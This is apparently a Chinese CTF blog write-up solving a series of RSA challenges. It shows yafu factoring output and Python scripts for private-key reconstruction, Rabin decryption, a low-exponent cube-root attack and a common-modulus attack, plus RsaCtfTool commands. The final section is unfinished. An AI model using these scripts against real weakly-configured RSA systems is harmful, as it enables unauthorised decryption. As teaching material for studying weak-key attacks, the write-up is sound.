fac: using pretesting plan: normal
fac: no tune info: using qs/gnfs crossover of 95 digits
div: primes less than 10000
fmt: 1000000 iterations
rho: x^2 + 3, starting 1000 iterations on C77
rho: x^2 + 2, starting 1000 iterations on C77
rho: x^2 + 1, starting 1000 iterations on C77
pm1: starting B1 = 150K, B2 = gmp-ecm default on C77
ecm: 30/30 curves on C77, B1=2K, B2=gmp-ecm default
ecm: 74/74 curves on C77, B1=11K, B2=gmp-ecm default
ecm: 149/149 curves on C77, B1=50K, B2=gmp-ecm default, ETA: 0 sec

starting SIQS on c77: 87924348264132406875276140514499937145050893665602592992418171647042491658461

==== sieving in progress (1 thread):   36224 relations needed ====
====           Press ctrl-c to abort and save state           ====
36365 rels found: 18303 full + 18062 from 192045 partial, (1292.02 rels/sec)

SIQS elapsed time = 164.9998 seconds.
Total factoring time = 188.9755 seconds


***factors found***

P39 = 275127860351348928173285174381581152299
P39 = 319576316814478949870590164193048041239

ans = 1

python代码生成私钥

##python 2.7 环境

coding=utf-8
import math
import sys
from Crypto.PublicKey import RSA
keypair = RSA.generate(1024)
keypair.p = 275127860351348928173285174381581152299
keypair.q = 319576316814478949870590164193048041239
keypair.e = 65537
keypair.n = keypair.p * keypair.q
Qn = long((keypair.p-1) * (keypair.q-1))
i = 1
while (True):
    x = (Qn * i ) + 1
    if (x % keypair.e == 0):
        keypair.d = x / keypair.e
        break
    i += 1
private = open('private.pem','w')
private.write(keypair.exportKey())
private.close()

openssl 解密

@Archerx MINGW64 ~/Desktop/mediumRSA
$ openssl rsautl -in flag.enc -out flag.txt -inkey private.pem -decrypt -pkcs

RSActfTOOL

可以用公钥直接生成私钥

python RsaCtfTool.py  --publickey pub.key  --private > private.key

私钥解密:

➜  RSA openssl rsautl -decrypt -in flag.enc -inkey private.key -out flag.txt

低指数加密攻击

hard RSA

提取公钥发现e=2,N与上面一样,用rabin算法(脚本只适合e=2的情况)

N在上面已经用yafu分解出来了,直接用就可以了。

python脚本如下:

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import gmpy2
import string
from Crypto.PublicKey import RSA
with open('pubkey.pem', 'r') as f:
    key = RSA.importKey(f)
    N = key.n
    e = key.e
with open('flag.enc', 'r') as f:
    cipher = f.read().encode('hex')
    cipher = string.atoi(cipher, base=16)
    # print cipher
p = 275127860351348928173285174381581152299
q = 319576316814478949870590164193048041239
inv_p = gmpy2.invert(p, q)
inv_q = gmpy2.invert(q, p)
mp = pow(cipher, (p + 1) / 4, p)
mq = pow(cipher, (q + 1) / 4, q)
a = (inv_p * p * mq + inv_q * q * mp) % N
b = N - int(a)
c = (inv_p * p * mq - inv_q * q * mp) % N
d = N - int(c)
for i in (a, b, c, d):
    s = '%x' % i
    if len(s) % 2 != 0:
        s = '0' + s
print s.decode('hex')

另一道ctf

#n:  0x52d483c27cd806550fbe0e37a61af2e7cf5e0efb723dfc81174c918a27627779b21fa3c851e9e94188eaee3d5cd6f752406a43fbecb53e80836ff1e185d3ccd7782ea846c2e91a7b0808986666e0bdadbfb7bdd65670a589a4d2478e9adcafe97c6ee23614bcb2ecc23580f4d2e3cc1ecfec25c50da4bc754dde6c8bfd8d1fc16956c74d8e9196046a01dc9f3024e11461c294f29d7421140732fedacac97b8fe50999117d27943c953f18c4ff4f8c258d839764078d4b6ef6e8591e0ff5563b31a39e6374d0d41c8c46921c25e5904a817ef8e39e5c9b71225a83269693e0b7e3218fc5e5a1e8412ba16e588b3d6ac536dce39fcdfce81eec79979ea6872793L
#e:  0x3
#c:0x10652cdfaa6b63f6d7bd1109da08181e500e5643f5b240a9024bfa84d5f2cac9310562978347bb232d63e7289283871efab83d84ff5a7b64a94a79d34cfbd4ef121723ba1f663e514f83f6f01492b4e13e1bb4296d96ea5a353d3bf2edd2f449c03c4a3e995237985a596908adc741f32365
so,how to get the message?

低指数加密攻击破解脚本:

import gmpy2,binascii,libnum,time
n=0x52d483c27cd806550fbe0e37a61af2e7cf5e0efb723dfc81174c918a27627779b21fa3c851e9e94188eaee3d5cd6f752406a43fbecb53e80836ff1e185d3ccd7782ea846c2e91a7b0808986666e0bdadbfb7bdd65670a589a4d2478e9adcafe97c6ee23614bcb2ecc23580f4d2e3cc1ecfec25c50da4bc754dde6c8bfd8d1fc16956c74d8e9196046a01dc9f3024e11461c294f29d7421140732fedacac97b8fe50999117d27943c953f18c4ff4f8c258d839764078d4b6ef6e8591e0ff5563b31a39e6374d0d41c8c46921c25e5904a817ef8e39e5c9b71225a83269693e0b7e3218fc5e5a1e8412ba16e588b3d6ac536dce39fcdfce81eec79979ea6872793L
e=3
res=0
# c=int(open('flag.enc','rb').read().encode('hex'),16)
c = 0x10652cdfaa6b63f6d7bd1109da08181e500e5643f5b240a9024bfa84d5f2cac9310562978347bb232d63e7289283871efab83d84ff5a7b64a94a79d34cfbd4ef121723ba1f663e514f83f6f01492b4e13e1bb4296d96ea5a353d3bf2edd2f449c03c4a3e995237985a596908adc741f32365
print time.asctime()
for i in xrange(200000000):
    if gmpy2.iroot(c+n*i,3)[1]==1:
        res=gmpy2.iroot(c+n*i,3)[0]
        print i,res
        print libnum.n2s(res)
        print time.asctime()
        break

共模攻击

Very Hard RSA

加密代码如下:

#!/usr/bin/env python3
import random

N = 0x00b0bee5e3e9e5a7e8d00b493355c618fc8c7d7d03b82e409951c182f398dee3104580e7ba70d383ae5311475656e8a964d380cb157f48c951adfa65db0b122ca40e42fa709189b719a4f0d746e2f6069baf11cebd650f14b93c977352fd13b1eea6d6e1da775502abff89d3a8b3615fd0db49b88a976bc20568489284e181f6f11e270891c8ef80017bad238e363039a458470f1749101bc29949d3a4f4038d463938851579c7525a69984f15b5667f34209b70eb261136947fa123e549dfff00601883afd936fe411e006e4e93d1a00b0fea541bbfc8c5186cb6220503a94b2413110d640c77ea54ba3220fc8f4cc6ce77151e29b3e06578c478bd1bebe04589ef9a197f6f806db8b3ecd826cad24f5324ccdec6e8fead2c2150068602c8dcdc59402ccac9424b790048ccdd9327068095efa010b7f196c74ba8c37b128f9e1411751633f78b7b9e56f71f77a1b4daad3fc54b5e7ef935d9a72fb176759765522b4bbc02e314d5c06b64d5054b7b096c601236e6ccf45b5e611c805d335dbab0c35d226cc208d8ce4736ba39a0354426fae006c7fe52d5267dcfb9c3884f51fddfdf4a9794bcfe0e1557113749e6c8ef421dba263aff68739ce00ed80fd0022ef92d3488f76deb62bdef7bea6026f22a1d25aa2a92d124414a8021fe0c174b9803e6bb5fad75e186a946a17280770f1243f4387446ccceb2222a965cc30b3929L

def pad_even(x):
    return ('', '0')[len(x)%2] + x

e1 = 17
e2 = 65537


fi = open('flag.txt','rb')
fo1 = open('flag.enc1','wb')
fo2 = open('flag.enc2','wb')


data = fi.read()
fi.close()

while (len(data)<512-11):
    data  =  chr(random.randint(0,255))+data

data_num = int(data.encode('hex'),16)

encrypt1 = pow(data_num,e1,N)
encrypt2 = pow(data_num,e2,N)


fo1.write(pad_even(format(encrypt1,'x')).decode('hex'))
fo2.write(pad_even(format(encrypt2,'x')).decode('hex'))

fo1.close()
fo2.close()

注:N后面的L是为了强制编译器把常量作为长整数来处理,只需在后边加上一个字母L(或l)

首先看这个N长度(4096bit)就别想分解了。

代码可以看到是相同的N,不同的E加密的,那就使用共模攻击

解密代码如下:

#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Archerx
# @time: 2018/9/11 下午 06:11


import gmpy2
def ByteToHex( bins ):
    return ''.join( [ "%02X" % x for x in bins ] ).strip()
def n2s(num):
    t = hex(num)[2:]
    if len(t) % 2 == 1:
        t = '0'+ t
    return ''.join([chr(int(b, 16)) for b in [t[i:i+2] for i in range(0, len(t), 2)]])
n = 0x00b0bee5e3e9e5a7e8d00b493355c618fc8c7d7d03b82e409951c182f398dee3104580e7ba70d383ae5311475656e8a964d380cb157f48c951adfa65db0b122ca40e42fa709189b719a4f0d746e2f6069baf11cebd650f14b93c977352fd13b1eea6d6e1da775502abff89d3a8b3615fd0db49b88a976bc20568489284e181f6f11e270891c8ef80017bad238e363039a458470f1749101bc29949d3a4f4038d463938851579c7525a69984f15b5667f34209b70eb261136947fa123e549dfff00601883afd936fe411e006e4e93d1a00b0fea541bbfc8c5186cb6220503a94b2413110d640c77ea54ba3220fc8f4cc6ce77151e29b3e06578c478bd1bebe04589ef9a197f6f806db8b3ecd826cad24f5324ccdec6e8fead2c2150068602c8dcdc59402ccac9424b790048ccdd9327068095efa010b7f196c74ba8c37b128f9e1411751633f78b7b9e56f71f77a1b4daad3fc54b5e7ef935d9a72fb176759765522b4bbc02e314d5c06b64d5054b7b096c601236e6ccf45b5e611c805d335dbab0c35d226cc208d8ce4736ba39a0354426fae006c7fe52d5267dcfb9c3884f51fddfdf4a9794bcfe0e1557113749e6c8ef421dba263aff68739ce00ed80fd0022ef92d3488f76deb62bdef7bea6026f22a1d25aa2a92d124414a8021fe0c174b9803e6bb5fad75e186a946a17280770f1243f4387446ccceb2222a965cc30b3929
e1 = 17
e2 = 65537
s = gmpy2.gcdext(e1,e2)     #gmpy2.gcdext(e1,e2)的运行结果为元组(mpz(1), mpz(30841), mpz(-8)),所以元组的第0个值不能取,第1个值才是s1,第2个值由于是负数,所以要取反,变为正数
s1 = s[1]
s2 = -s[2]
file1 = open("flag.enc1" ,'rb').read()
c1 = int(ByteToHex(file1),16)
file2 = open("flag.enc2" ,'rb').read()
c2 = int(ByteToHex(file2),16)
c2 = gmpy2.invert(c2, n)        #由于根据前面的运算,s1是正数,s2是负数,后面需要运算c2的s2次幂。因为在数论模运算中,要求一个数的负数次幂,与常规方法并不一样,比如此处要求c2的s2次幂,就要先计算c2的模反元素c2r,然后求c2r的-s2次幂。
m = (pow(c1,s1,n) * pow(c2 , s2 , n)) % n
print(n2s(m))

Extremely hard RSA

题目信息:没想到 RSA4096 都被你给破了,一定是我的问题,给了你太多信息,这次我只给你一个 flag 的加密值和公钥,仍然是 RSA4096,我就不信你还能解出来。

#python2.7

import gmpy2,binascii,libnum,time
n=0xB0BEE5E3E9E5A7E8D00B493355C618FC8C7D7D03B82E409951C182F398DEE3104580E7BA70D383AE5311475656E8A964D380CB157F48C951ADFA65DB0B122CA40E42FA709189B719A4F0D746E2F6069BAF11CEBD650F14B93C977352FD13B1EEA6D6E1DA775502ABFF89D3A8B3615FD0DB49B88A976BC20568489284E181F6F11E270891C8EF80017BAD238E363039A458470F1749101BC29949D3A4F4038D463938851579C7525A69984F15B5667F34209B70EB261136947FA123E549DFFF00601883AFD936FE411E006E4E93D1A00B0FEA541BBFC8C5186CB6220503A94B2413110D640C77EA54BA3220FC8F4CC6CE77151E29B3E06578C478BD1BEBE04589EF9A197F6F806DB8B3ECD826CAD24F5324CCDEC6E8FEAD2C2150068602C8DCDC59402CCAC9424B790048CCDD9327068095EFA010B7F196C74BA8C37B128F9E1411751633F78B7B9E56F71F77A1B4DAAD3FC54B5E7EF935D9A72FB176759765522B4BBC02E314D5C06B64D5054B7B096C601236E6CCF45B5E611C805D335DBAB0C35D226CC208D8CE4736BA39A0354426FAE006C7FE52D5267DCFB9C3884F51FDDFDF4A9794BCFE0E1557113749E6C8EF421DBA263AFF68739CE00ED80FD0022EF92D3488F76DEB62BDEF7BEA6026F22A1D25AA2A92D124414A8021FE0C174B9803E6BB5FAD75E186A946A17280770F1243F4387446CCCEB2222A965CC30B3929
e=3
res=0
c=int(open('flag.enc','rb').read().encode('hex'),16)
print time.asctime()
for i in xrange(200000000):
    if gmpy2.iroot(c+n*i,3)[1]==1:
        res=gmpy2.iroot(c+n*i,3)[0]
        print i,res
        print libnum.n2s(res)
        print time.asctime()
        break

破电脑跑了快半个小时,期间以为卡了,还好跑出来了&……

God Like RSA

私钥恢复的一些知识,我也不会……

preView